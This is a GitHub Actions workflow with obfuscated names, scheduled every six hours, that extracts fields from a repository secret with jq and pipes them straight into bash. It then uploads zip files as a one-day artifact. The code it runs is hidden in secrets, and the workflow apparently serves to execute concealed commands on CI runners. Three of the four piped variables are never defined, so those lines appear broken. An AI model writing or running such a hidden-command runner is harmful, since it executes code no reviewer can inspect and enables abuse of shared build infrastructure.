name: shuangrizoubo
on:
  workflow_dispatch:

  schedule:
    - cron: '50 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shuangrizoubo
        env:
          lf536: ${{ secrets.lf536 }}
        run: |
          printf '%s' "$lf536" | jq -r .npjx74697 | /bin/bash
          echo $tkgi912 | jq -r .vzvo06880 | /bin/bash
          echo $f653 | jq -r .i346 | /bin/bash
          printf '%s' "$cqsz7" | jq -r .d6 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: DsICEXdl
          path: "*.zip"
          retention-days: 1
